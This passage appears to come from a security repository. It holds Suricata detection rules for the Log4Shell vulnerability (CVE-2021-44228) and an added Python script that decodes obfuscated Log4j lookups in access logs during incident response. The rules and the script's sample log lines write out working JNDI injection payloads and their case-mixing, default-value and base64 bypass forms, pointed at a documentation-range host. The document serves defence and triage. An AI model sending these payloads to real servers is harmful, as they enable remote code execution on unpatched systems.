content:"|2e|exec"; distance:0; content:"FromCharCode"; nocase; distance:0; reference:url,ldap.com/ldapv3-wire-protocol-reference-ldap-result/; reference:url,ldap.com/ldapv3-wire-protocol-reference-search/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034769; rev:2; metadata:created_at 2021_12_20, cve CVE_2021_44228, former_category ATTACK_RESPONSE, updated_at 2021_12_20;) alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower TCP Bypass) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|lower|3a|j"; nocase; fast_pattern; content:"n"; distance:0; within:12; content:"d"; distance:0; within:12; content:"i"; distance:0; within:12; reference:cve,2021-44228; classtype:attempted-admin; sid:2034808; rev:1; metadata:created_at 2021_12_20, cve CVE_2021_44228, former_category HUNTING, updated_at 2021_12_20;) alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower UDP Bypass) (CVE-2021-44228)"; content:"|24 7b|lower|3a|j"; nocase; 
fast_pattern; content:"n"; distance:0; within:12; content:"d"; distance:0; within:12; content:"i"; distance:0; within:12; reference:cve,2021-44228; classtype:attempted-admin; sid:2034809; rev:1; metadata:created_at 2021_12_20, cve CVE_2021_44228, former_category HUNTING, updated_at 2021_12_20;) alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper TCP Bypass) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|upper|3a|j"; nocase; fast_pattern; content:"n"; distance:0; within:12; content:"d"; distance:0; within:12; content:"i"; distance:0; within:12; reference:cve,2021-44228; classtype:attempted-admin; sid:2034810; rev:1; metadata:created_at 2021_12_20, cve CVE_2021_44228, former_category HUNTING, updated_at 2021_12_20;) alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper UDP Bypass) (CVE-2021-44228)"; content:"|24 7b|upper|3a|j"; nocase; fast_pattern; content:"n"; distance:0; within:12; content:"d"; distance:0; within:12; content:"i"; distance:0; within:12; reference:cve,2021-44228; classtype:attempted-admin; sid:2034811; rev:1; metadata:created_at 2021_12_20, cve CVE_2021_44228, former_category HUNTING, updated_at 2021_12_20;) ```
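The Suricata signatures above catch the JNDI lookup on the wire in each of its observed disguises (`${lower:..}`/`${upper:..}`, the `${::-x}` and `${env:NaN:-x}` default-value forms, nesting, and `${base64:..}`). When the traffic is already gone and only access logs remain, the same normalization is useful in triage. The script below is an added example, not code from this repository or from the ET rule set: it peels those lookup layers from the inside out and reports which JNDI scheme (ldap, rmi, dns, ...) the normalized text requests. The sample log lines, the 203.0.113.0/24 hosts and the paths are constructed; it only handles the lookup forms the rules above target, so treat it as a triage aid alongside the signatures, not a replacement for them.

```python
"""Added example: normalize Log4j 2 lookup obfuscation in log lines and
report JNDI lookups, mirroring what the Suricata rules above match on the
wire.  Sample lines, hosts and paths are constructed for this example."""
import base64
import binascii
import re

# Innermost ${...} that contains no further ${ or }.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# ${name:key:-default}, e.g. ${::-j} or ${env:NaN:-j}: an undefined lookup
# resolves to its default text, so the default is substituted.
DEFAULT_VALUE = re.compile(r"^[A-Za-z]*:[^:]*:-(.*)$", re.S)
# ${lower:x} / ${upper:x} case lookups.
CASE_LOOKUP = re.compile(r"^(lower|upper):(.*)$", re.I | re.S)
# ${base64:...}; the rules above match "${base64:JHtqbmRp" (base64 of "${jndi").
BASE64_LOOKUP = re.compile(r"^base64:([A-Za-z0-9+/=]+)$")
# What remains after peeling: a JNDI lookup and its scheme (ldap, rmi, dns, ...).
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([A-Za-z]+)\s*:", re.I)


def _resolve(match):
    """Resolve one innermost lookup; unknown lookups are left untouched."""
    body = match.group(1)
    m = CASE_LOOKUP.match(body)
    if m:
        return m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper()
    m = DEFAULT_VALUE.match(body)
    if m:
        return m.group(1)
    m = BASE64_LOOKUP.match(body)
    if m:
        try:
            return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            return match.group(0)
    return match.group(0)  # e.g. ${jndi:...} or ${date:...} stays as written


def normalize(text, max_rounds=32):
    """Peel obfuscation layers from the inside out until the text stops changing."""
    for _ in range(max_rounds):
        new = INNERMOST.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text


def scan_line(line):
    """Normalize one log line and list the JNDI schemes it requests."""
    normalized = normalize(line)
    return {
        "jndi_schemes": sorted({s.lower() for s in JNDI.findall(normalized)}),
        "lookups_resolved": normalized != line,  # True if any layer was peeled
        "normalized": normalized,
    }


def scan_lines(lines):
    """Return scan results only for lines that contain a JNDI lookup."""
    return [r for r in map(scan_line, lines) if r["jndi_schemes"]]


# Constructed sample access-log lines (203.0.113.0/24 is a documentation range).
_B64 = base64.b64encode(b"${jndi:ldap://203.0.113.10:1389/a}").decode()
SAMPLE_LINES = [
    # plain lookup in the User-Agent field
    '203.0.113.7 - - "GET / HTTP/1.1" 404 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    # lower/upper mix, as in the modsecurity sample list above
    '203.0.113.7 - - "GET / HTTP/1.1" 404 "-" "${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://203.0.113.10:1099/a}"',
    # ${::-x} default-value form (sid 2034804/2034805 above)
    '203.0.113.7 - - "GET / HTTP/1.1" 404 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.10/a}"',
    # env:NaN default form (sid 2034755 above)
    '203.0.113.7 - - "GET / HTTP/1.1" 404 "-" "${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//203.0.113.10/a}"',
    # base64 form (sid 2034750/2034751 above)
    f'203.0.113.7 - - "GET / HTTP/1.1" 404 "-" "${{base64:{_B64}}}"',
    # benign request
    '203.0.113.8 - - "GET /index.html HTTP/1.1" 200 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_lines(SAMPLE_LINES):
        print(hit["jndi_schemes"], hit["normalized"])
```

Run it directly to print the five hits with their normalized payloads; `scan_lines()` over a real access log gives the decoded `${jndi:<scheme>://host...}` per line, which is the host you want to pivot on (egress logs, DNS) during incident response. A line that normalizes but yields no JNDI scheme (`lookups_resolved` true, `jndi_schemes` empty) is still worth a look, since the hunting rules above alert on bare `${lower:` / `${upper:` / `${::` sequences for that reason.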